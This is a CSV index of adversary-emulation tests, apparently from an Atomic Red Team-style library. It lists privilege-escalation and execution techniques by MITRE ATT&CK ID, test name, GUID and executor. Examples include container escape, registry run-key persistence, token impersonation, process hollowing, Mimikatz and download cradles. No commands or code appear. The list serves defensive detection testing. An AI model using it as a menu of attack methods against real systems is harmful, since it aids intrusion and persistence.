privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
execution,T1204.002,User Execution: Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4549-bc98-210f7019efff,powershell
execution,T1204.002,User Execution: Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,User Execution: Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,User Execution: Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,User Execution: Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,User Execution: Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,User Execution: Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
